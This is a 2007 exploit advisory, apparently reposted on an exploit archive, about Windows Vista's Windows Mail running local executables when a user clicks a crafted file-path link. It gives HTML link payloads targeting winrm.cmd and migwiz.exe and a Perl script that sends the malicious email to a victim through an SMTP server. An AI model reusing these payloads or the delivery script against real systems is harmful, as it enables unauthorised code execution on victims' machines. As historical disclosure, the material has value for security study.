Home / exploitsPDF  

vista-pwn.txt

Posted on 24 March 2007

Microsoft Windows Vista - Windows Mail Client Side Code Execution Vulnerability Successfully Tested on Windows Vista Ultimate Greetings fly out to Alex,wtfomg,Thierry,Andi and Blackzero Description Windows Mail is the default Mail Client of Microsoft Windows Vista. Vulnerability Remote Code Execution is possible if a user clicks on a malicious prepared link. Vistas Mail Client will execute any executable file if a folder exists with the same name. For example the victim has a folder in C: named blah and a batch script named blah.bat also in C:. Now if the victim clicks on a link in the email message with the URL target set to C:lah the batch script is executed without even asking. There is for example a CMD script by default in C:WindowsSystem32 named winrm.cmd (and also a folder named winrm inside System32). Exploit: Send a HTML email message containing the URL: <a href="c:/windows/system32/winrm?">Click here!</a> or <a href="c:/windows/system32/migwiz?">Click here!</a> and winrm.cmd/migwiz.exe gets executed without asking for permission. These are just examples. I could not pass arguments to winrm (hehe this would be beautiful), but I guess there are several attack vectors. Proof of Concept ---snip--- use Net::SMTP_auth; $smtp = Net::SMTP_auth->new('smtp.1und1.de', Debug => 1); $smtp->auth('PLAIN', 'username', 'password'); $smtp->mail("attacker@attacker.com"); $smtp->to("victim@victim.com"); $msg = "Subject: Vista Remote Code Exec " ."From: attacker@attacker.com " ."To: victim@victim.com " ."MIME-Version: 1.0 " ."Content-Type: text/html <a href="c:/windows/system32/winrm?">Click here!</a>"; $smtp->data(); $smtp->datasend("$msg "); $smtp->dataend(); $smtp->quit; ---snip--- Signed, Kingcope / kingcope[at]gmx.net / 2007

 

TOP